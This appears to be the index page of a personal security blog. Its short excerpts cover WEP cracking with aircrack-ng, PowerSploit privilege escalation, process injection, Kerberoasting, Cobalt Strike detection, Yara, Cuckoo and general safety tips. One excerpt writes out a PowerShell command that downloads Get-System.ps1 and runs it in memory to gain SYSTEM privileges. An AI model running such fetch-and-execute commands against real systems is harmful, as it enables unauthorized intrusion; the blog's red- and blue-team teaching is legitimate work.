https://www.linkedin.com/in/david-johnson-614193ab/ https://www.youtube.com/@yojimbosecurityninja
wep
Table of Contents 1. Step 1: Monitor 2. Step 2: Packet Capture 3. Step 3: Fake Auth 4. Step 4: Classic Attack 5. Setp 5: De-Auth 6. Step 6: Crack the Key 7. Summary WEP, Wired Equivalent Privacy, has been broken for a while now and should never be used.
wep
Table of Contents 1. Setup 1. Monitor Mode 2. Packet Capture 3. Fake Authentication 2. Fragmentation 3. Korek Chop Chop 4. Packet Forge 5. ARP replay 6. Modified Packet Replay This is intended to be a quick reference for more detailed information please refer to aircrack-ng documentation. Setup Monitor Mode
microsoft
Here I will demonstrate how to get system level privileges with PowerSploits Get-System. Getting System Level Privileges First lets load Get-System into memory. Iex(New-Object net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSplo it/master/Privesc/Get-System.ps1') Next lets get system level privileges using Named Pipes.
microsoft
Vulcan can preform several different process injection techniques on Windows machines. Including DLL Injection, Shellcode Injection, and Process Hollowing. It is a useful tool for the red teamer allowing custom shell code to be executed. For the blue teamer it is a great way to test your defenses. Prerequisite * Vulcan
blueteam
What is Yara The pattern matching swiss knife for malware researchers (and everyone else) To me Yara is regex with logic and metadata. It allows you to create rules to match patterns in data and adding matadata to give it more context. You can run yara as a executable or
What is Cuckoo? Cuckoo is a sandbox for testing malware. What does that mean? Well, a sandbox is a safe place to execute code, open urls. Host Setup I am installing cuckoo on Ubuntu as recommended by cuckoos instilation documentation, found here. I did not install volatility at this time
detection
In this post I will cover Miters Process Injection (T1055) and some ways that you can detect it and prove it's working. Process Injection I will not go into to much detail on Process Injection here. If you want a deep dive, I recommend Endgames blog post. I
microsoft
Mitre ATT&CK technique T1558.003 or more commonly known as Kerberoasting, is a technique that allows a malicious actor to brute force Kerberos TGS(ticket-granting service) tickets offline. This technique requires Active Directory and a user with an SPN(service principal name). Here I will not be covering
detection
Cobalt Strike is threat emulation software. It is a proprietary product used by... well who ever can afford it. However, it has been reverse engineered and some code leaked. Also, security researchers have extensively scrutinized it. For example, some people have noticed a pattern in Cobalt Strike use of Named
clickbate
With many people working from home due to the COVID-19 pandemic, there has been an increase in cyber threats targeting remote workers. Here are a few ways that you can stay secure while working remotely: 1. Use a secure internet connection: Make sure that you are using a secure internet
Ransomware is a type of malware that encrypts a victim's files, making them inaccessible until a ransom is paid to the attacker. Here are some steps that you can take to protect yourself from ransomware attacks: 1. Use strong passwords and enable two-factor authentication: Strong, unique passwords and
It is difficult to predict exactly what cybersecurity threats will emerge in the future, as the landscape is constantly evolving. However, there are certain types of threats that are likely to continue to be a concern in the coming years. Some of the threats to watch out for in 2023